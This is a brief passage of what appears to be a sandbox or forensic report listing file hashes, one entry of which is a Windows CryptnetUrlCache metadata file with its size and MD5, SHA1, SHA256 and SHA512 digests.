SHA256 9c6cf70d27e3fb91acc9aeb853c7397b88a2ccff2f3de5ebb0e5e98f7fe8480a
SHA512 430b101503210bd5dc3889de29971968a91d0cdb3bcf2ad9fb1346b550a44a5c9f475bf538caba922efe8afba9aab76a042073054b46b65abd03e59ae89935d7
-
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize 330B
MD5 c5d8221366b919aece1f0c5211818bdb
SHA1 3830c4dedf33633e17bd128f6bff3b729ee12c03
SHA256 8a5859aaac4e5503f09b453c8b640859387f7cf85d3e1448f1bbfd1c17200184
SHA512 e3c9b562de6bd70321f3ab542237a0947ec3a02e633b847ac7bfbebd24e3af1fef87e07cb3bb7e73c49c18497c16919ca5322ad160297dba3c63fb968a99216b
-